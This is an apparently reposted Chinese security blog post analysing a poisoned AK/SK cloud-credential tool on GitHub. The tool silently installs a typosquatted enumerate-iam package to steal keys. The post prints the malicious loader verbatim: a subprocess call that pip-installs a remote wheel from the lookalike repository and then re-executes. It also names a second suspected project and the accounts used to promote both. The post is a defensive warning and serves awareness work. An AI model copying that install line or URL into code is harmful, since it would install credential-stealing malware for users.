文章总结： 文档分析了一起针对云安全工具的供应链投毒事件，攻击者在GitHub项目accesskeytools中植入后门代码，通过仿冒依赖包窃取用户AK/SK密钥。关键发现包括攻击者自2023年8月起在多平台同步推广恶意项目，并存在第二个疑似投毒项目jumpserverdecrypto。建议安全从业者使用AI辅助代码审计，警惕第三方依赖风险。 综合评分： 72 文章分类： 供应链安全,恶意软件,安全工具,漏洞预警,安全意识

简单分析AKSK利用工具投毒事件

原创

3had0w 3had0w

潇湘信安

2026年6月12日 08:20 湖南

在小说阅读器读本章

去阅读

| Ima知识库名称 | 加入条件 | | — | — | | 潇湘信安协同知识库（更新~ing!） | 限时免费 | | 潇湘信安学习资料库（更新~ing!） | ≥3年粉丝 | | 潇湘信安内部知识库（更新~ing!） | 星球成员 |

昨天t00ls社区有师傅曝出一个拥有500+Star的AKSK利用工具项目存在后门投毒，群里@无解和@嘞萌师傅看到后借助AI对这个后门项目进行了一些简单的分析追溯，但我们不保证分析的绝对准确，只是将我们在分析过程中发现的一些东西分享出来，能力有限，没有深入，对此感兴趣的师傅可以进一步去分析和验证…！

后门项目地址：

https://github.com/kohlersbtuh15/accesskey_tools

这个投毒项目issues已经是骂声一片，但在我们发文前这人已经关闭issues并进行了控评，当时忘截图了，这里贴的是其他群里师傅发的一张图…。

其实早在2023年10月Checkmarx安全公司就曝光过kohlersbtuh15的供应链攻击，指的应该就是accesskey_tools项目，但没有提及具体技术细节。今年5月先知社区也有师傅发过分析文章…！

发现针对Telegram、AWS和阿里云用户的供应链攻击：https://www.anquanke.com/post/id/290825

但这里我没搞懂为什么写的是Telegram？而不是TencentCloud…？？？

速速自查！500stars 云利用工具投毒分析：

https://xz.aliyun.com/news/92135

0x01 分析过程

1、accesskey_tools

以下为@无解师傅使用AI对accesskey_tools后门项目的分析截图：

这个投毒者的Github只有accesskey_tools这一个项目，而且个人资料啥都没有，贡献记录也是私密的，不知为啥还有人敢用，还给点了Star。

项目创建日期为：2023年8月15日。

从存在后门的aws/aws_select_iam.py文件Commit可以看到他是在25年11月18日才更新的这后门代码，这个项目从创建至今快有3年了，但并不是圈内传的已存在3年，之前可能用的是其他技术手段？

https://github.com/kohlersbtuh15/accesskey_tools/commit/39a66fce24b22e6bf947d052a36c3a1d13b71963.patch

还有从aws/aws_select_iam.py文件中的8-12行可以看到它在运行时会静默安装一个他仿冒篡改过的一个恶意依赖包enumerate_iam，并且Commit最后日期也是25年11月18日。

仿冒的恶意包项目地址：

https://github.com/andresrianch/enumerate-iam

官方项目：andresriancho/enumerate-iam

仿冒项目：andresrianch/enumerate-iam（少个o）

if importlib.util.find_spec("enumerate_iam") is None:    subprocess.run(    [sys.executable, "-m", "pip", "install", "-qqq", "--disable-pip-version-check", "https://github.com/andresrianch/enumerate-iam/releases/download/1.0.2/aws_enumerateiam-1.0.2-py3-none-any.whl"],    check=True)    os.execv(sys.executable, [sys.executable] + sys.argv)

另外我们通过Google找到他们主要通过以下这些平台来推广他们的投毒项目，而且观察发现他们入驻平台和首篇文章的发文时间都高度集中在23年8月份左右，为后续投毒做准备吧…！

****Buf：https://www.freebuf.com/author/root9527知乎：https://www.zhihu.com/people/liuliumei-83/posts掘金：https://juejin.cn/user/3310002148755357/postsCSDN：https://blog.csdn.net/saygoodbyeyoBlogger：https://kohlersbtuh15.blogspot.com...SNIP...

****Buf：

知乎：

掘金：

2、jumpserver_decrypto

我们还在****Buf平台找到他们最后25年8月25日发的一个Jumpserver_decrypto项目（疑似他们的另一个投毒项目，也是伪造的恶意依赖包（whl文件），攻击手法类似…！）。

疑似后门项目地址：

https://github.com/yigexiaoyunwei/jumpserver_decrypto

以下为@无解师傅使用AI对Jumpserver_decrypto疑似后门项目的分析截图：

0x02 文末总结

此次投毒事件主要针对人群：中文云安全社区、渗透测试等人员，至于投毒者的背景、目的咱也不知道，也不敢瞎说！个人？团队？组织？或者是…？但我们知道的是他们不是啥“好人”！！！近几年的各种供应链投毒攻击事件特别多，啥背景的都有，咱们作为安全从业者或者爱好者，需时刻关注、警惕、防范此类攻击，现在有了AI也能够帮助我们快速辅助分析项目代码是否安全，其实也花不了多少时间成本，别懒…！

还好我菜，用不到这些工具，要不可能也中招了，这次不知道有多少人中招…？

关注我们

 还在等什么？赶紧点击下方名片开始学习吧 

知 识 星 球

星球已过800人，暂不再发放优惠券，如还有需要的师傅可加我VX：S_3had0w，等你一起来学习…！

| Ima知识库名称 | 加入条件 | | — | — | | 潇湘信安协同知识库（更新~ing!） | 限时免费 | | 潇湘信安学习资料库（更新~ing!） | ≥3年粉丝 | | 潇湘信安内部知识库（更新~ing!） | 星球成员 |

| | | | — | — | | | |

推 荐 阅 读

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：潇湘信安 3had0w 3had0w《简单分析AKSK利用工具投毒事件》